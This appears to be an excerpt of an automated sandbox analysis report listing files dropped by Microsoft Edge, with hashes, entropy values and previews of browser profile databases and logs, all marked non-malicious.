                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):634858
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.015691041468973
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:EfC7zTsosGXbkcnRXFrshHk0rZkYVTeV89XYr3UHNboOqQnd+Nf3nXXodHUeWEv9:Ef4E9cnRXFQK0rZkF8dKOMi0pXiHRX0q
                                                                                                                                                                                                                                                                                              MD5:F788AA50AF1940237D392739DD2F53B1
                                                                                                                                                                                                                                                                                              SHA1:7B6C68524813D2072F517195D737CF487FD74F42
                                                                                                                                                                                                                                                                                              SHA-256:68AEAA7D72793EA6446A5470D4FA057EE6B796ACC7254FB7CAC39728624ED1A7
                                                                                                                                                                                                                                                                                              SHA-512:3014E93C02E4CAB07926A38B7B6AAB89409AE5212C00A103C4F0DB1921DFED20659913DF6AB7BBF71381277C36524014BF467E61A59A48EC405B5236618AB298
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:...m.................DB_VERSION.1l+Vc.................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):142
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0002375389471485
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:5JE38E28xp4m3rscUSWOUJOX1Om4lXlf+nETPxpK2x7L8V0jnBFUOfWcF:XE38D8xSEsI/UG1Ojl9+n0PxEWO0jnBT
                                                                                                                                                                                                                                                                                              MD5:54C204431D5F796DD6A085F3BC8C34CC
                                                                                                                                                                                                                                                                                              SHA1:6B52797A4FB826EF7C8A1FD30AAEED358D36CB4D
                                                                                                                                                                                                                                                                                              SHA-256:BBDBD4DF8AA707218DF1AD0D719852F1D975C50B9B8A656A6D33047B36E92390
                                                                                                                                                                                                                                                                                              SHA-512:508422424B83E80107067AF1CDA7A60B239A9D93D2ED0DC8FF142F1776B53EE1F8BFE004C57C3B8261912CF4DB78167CCA6FDD4B289B86E0F2ABE43554888F29
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:....9................BLOOM_FILTER_EXPIRY_TIME:.1733938835.377072.+C+G................BLOOM_FILTER_LAST_MODIFIED:.Tue, 10 Dec 2024 13:15:31 GMT
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):634833
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.015012816241871
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:EfC7cT5osGxbkHnRLFryhHV0rZUYVTKV8sXYl3UHNbooqQnd+E339XX7dH5eWEvx:Ef4oVHnRLFO/0rZUb8QWOoi04XhHAXa2
                                                                                                                                                                                                                                                                                              MD5:7A043B499C88417DAA2A334856FFB224
                                                                                                                                                                                                                                                                                              SHA1:CA277F06887073307841CA94AE3172FA575D60CD
                                                                                                                                                                                                                                                                                              SHA-256:C30C453876F0C4E8DB1960CBE0280044183C9D7ED9D5D661F3E691391DB86CC1
                                                                                                                                                                                                                                                                                              SHA-512:7BA5690EF819CAF93417708ED9A2675BB5A4FFA4944B76FEAF58D91B98C402918069FE4358B17C36664C7CD672CA80C06325B015959573F7F649B0F26F2CA19A
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.209254492968682
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7AWQ+v4Yebn9GFUt8OArW/+OA1NV5LYebn95Z9pTSf0TXXfHKOXBXh:7L4Yeb9ig8OyWOLYeb9zLnTXfXBXh
                                                                                                                                                                                                                                                                                              MD5:611CE369EBDEC542582DD41294142374
                                                                                                                                                                                                                                                                                              SHA1:2BF3F0223782AEDB77D6AFF4BB0FF1C2B7E81698
                                                                                                                                                                                                                                                                                              SHA-256:C8FB5008FC63DCD4546FF1A8095E03E9E152ED8ACC7ED196B810A5A78DAC5087
                                                                                                                                                                                                                                                                                              SHA-512:6572855A0EE801225C453143D0F6D508CF526BA820D91BD1AC4095A938E8236C363EBFE7C966F27D1E5F0527EFC8A626CA65EA350D49C8764285BD7142A1D78E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.066 1d5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/10-12:40:19.067 1d5c Recovering log #3.2024/12/10-12:40:19.068 1d5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/10-12:40:35.405 1d08 Level-0 table #5: started.2024/12/10-12:40:35.444 1d08 Level-0 table #5: 634833 bytes OK.2024/12/10-12:40:35.445 1d08 Delete type=0 #3.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.248480538985685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjGIOhinx6+qTxFxN3erkEtl:scoBY7jZNxDqTxFDkHl
                                                                                                                                                                                                                                                                                              MD5:42E7C651FA9CFE891D084F7A327ED9AF
                                                                                                                                                                                                                                                                                              SHA1:BF44DA5B3F89998DC693EE624C75DB1A56BFFF49
                                                                                                                                                                                                                                                                                              SHA-256:D3AF6DD512ADB5AAAB05A3B4A54908614D20103A03A61AF90F8409176FFDFF93
                                                                                                                                                                                                                                                                                              SHA-512:52CE8419D90C9836B270F53BC3B636D7EF158FCD3681B19517103D9240D2ADDC1F84293563F2FF5E7AB39A68A8FE0E4DD9860FDD04C120E89A7753CD385CE90C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......@.p:7...............&.BLOOM_FILTER:.........DB_VERSION........
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6144491545247914
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jDfpN3LmL:TO8D4jJ/6Up+0
                                                                                                                                                                                                                                                                                              MD5:76F5FEE04D9CF02AE8F3AB8453D4B375
                                                                                                                                                                                                                                                                                              SHA1:6E0A98C9D3AFF855C13876AC2AF3D31BB1B2FF4C
                                                                                                                                                                                                                                                                                              SHA-256:1DA92FF064A7FBC83B2F687FA4D5501BF3561CCB7E2FF9E0C9A07DCB5955D994
                                                                                                                                                                                                                                                                                              SHA-512:F28EB05677CD53D6FF1C550BF7500BC244E052823CCE05420A8A94D4F8465271E6E9C3785FCB5221E43C32FC1A71D1C22BEBC93444FB111F4AD1A9D03F21F680
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3......@
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):375520
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.354097648058685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:tA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:tFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                              MD5:EA35BC6F0056D6DF6151240238A02A53
                                                                                                                                                                                                                                                                                              SHA1:10D60E721C531C5CFDB345B106D697CA585824ED
                                                                                                                                                                                                                                                                                              SHA-256:75B7776ADFEB62BA0E38E8EF21656BFEBA0B84B11A6162A83960690A2DC7B88C
                                                                                                                                                                                                                                                                                              SHA-512:157475CA32C7EE7E2DCCFDEF6743DE71F7EA330311F22F250163262C0DCC24EB9E12E4E291801EC43BF9597DBDFF8B52429C3FBEFFE08EC655A0B4D5B7372296
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1..c&q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378326029106703..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):311
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.116705216663284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L7D1923oH+Tcwtk2WwnvB2KLlpLYLZq2P923oH+Tcwtk2WwnvIFUv:7PmYebkxwnvFLTKZv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                              MD5:A90B3E04A373B6BF41EE7A5503E591DC
                                                                                                                                                                                                                                                                                              SHA1:004435CE6513339EEB2F8A40DA372901C2464DBA
                                                                                                                                                                                                                                                                                              SHA-256:27A9EFD29C8C2A1DE09F112DA8552E6742995AF32D0DCE218DC35D665A6BC180
                                                                                                                                                                                                                                                                                              SHA-512:A93CA9080C7C8EE2BDBB20DAA0CCCA514AFEEA36E18F15B038BB7F20D5ABBB9DF4B44AF178AB86791EB458BECFF799CB0DD9BDCF595DE3F42644D3D85A3A626C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:24.973 2120 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/10-12:40:25.190 2120 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):358860
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324614946413927
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RF:C1gAg1zfvd
                                                                                                                                                                                                                                                                                              MD5:DB305A218A729CA2B1032FD0737EE9E6
                                                                                                                                                                                                                                                                                              SHA1:A1E87704A15E197F95E92349CDE60074244A8859
                                                                                                                                                                                                                                                                                              SHA-256:E0AEF39813315A928AA3791D5C29BEBA049CAAF208334F4CE324019D449F0819
                                                                                                                                                                                                                                                                                              SHA-512:E343688501098FD2BF5BC28F7143FDD34D18CE899847BF6EFD2D08CB32D98B80C5845152AAC2F7A5CB4BD1F7F6B7AE8340171E796D1853D6C17E493C96915CE8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181159026561858
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86Va+q2P923oH+Tcwt8aPrqIFUt8OL86VHkZmw+OL86VHEVkwO923oH+Tcwt8h:7A0v4YebL3FUt8OAL/+OAB5LYebQJ
                                                                                                                                                                                                                                                                                              MD5:F8E894E914B6D39C6D99AD82CA4F7D74
                                                                                                                                                                                                                                                                                              SHA1:C5064D1317E31E34E78C922C1437C2897231E9F5
                                                                                                                                                                                                                                                                                              SHA-256:F5293EAD2573AE94072190A37A41EBC2F2D087D1E627C00B1E25D4F07C30AECF
                                                                                                                                                                                                                                                                                              SHA-512:9F1F19C8FF5F3E89E797D7837FB972CF8E196122012B308CB3FD0026E1D813802013C56E78A5576B208B55034FED23BBBD2D23FE1CD3DC7B98D593D797B2EE38
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.074 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/10-12:40:19.076 1d58 Recovering log #3.2024/12/10-12:40:19.076 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13834233536306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86U+SQL+q2P923oH+Tcwt865IFUt8OL86QG1Zmw+OL86+QQLVkwO923oH+Tcwx:7Aayv4Yeb/WFUt8OAM/+OA7R5LYeb/+e
                                                                                                                                                                                                                                                                                              MD5:966309468774BDA607C319BE82683DDB
                                                                                                                                                                                                                                                                                              SHA1:C1991990981C7892D00766087497034252535AC1
                                                                                                                                                                                                                                                                                              SHA-256:46CBA445504777AB80951AAFDA8792B1B2D8374539B332F504D3D26A27C8484E
                                                                                                                                                                                                                                                                                              SHA-512:B9B2A5B00BB6BFD121F02400B4E4330C67E7C841B73C5C17C86A846A63FCCE9833319C8D8CE85DBD6BF4C8154F18935120B2B7FD8340BE8B863D6CD02B4BE4D4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.127 1d18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/10-12:40:19.136 1d18 Recovering log #3.2024/12/10-12:40:19.142 1d18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                              MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                              SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                              SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                              SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.103603484490593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LOiQ+q2P923oH+Tcwt8NIFUt8OLOigZmw+OLxQSQVkwO923oH+Tcwt8+eLJ:7q+v4YebpFUt8OqH/+OlQF5LYebqJ
                                                                                                                                                                                                                                                                                              MD5:79061DCF758914E608235896D9C951B3
                                                                                                                                                                                                                                                                                              SHA1:F69F836793E5E8A518C7F9CC8B5204EEA9CB578C
                                                                                                                                                                                                                                                                                              SHA-256:A23A3E379653F0F80945EEE33A4A9806B6E4A67E59CBB3609C85874BE476EEEE
                                                                                                                                                                                                                                                                                              SHA-512:1D6700ABE2BE5C6A37A722F0F075851E5C7651BD828FC0387D75DA97F35EA22AE48B49D042B2B22BF99D467FEE126AD7F22CE3C753636539464CA57E62645FBE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.905 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:40:20.905 1d08 Recovering log #3.2024/12/10-12:40:20.934 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):429
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                              MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                              SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                              SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                              SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                              Malicious:false
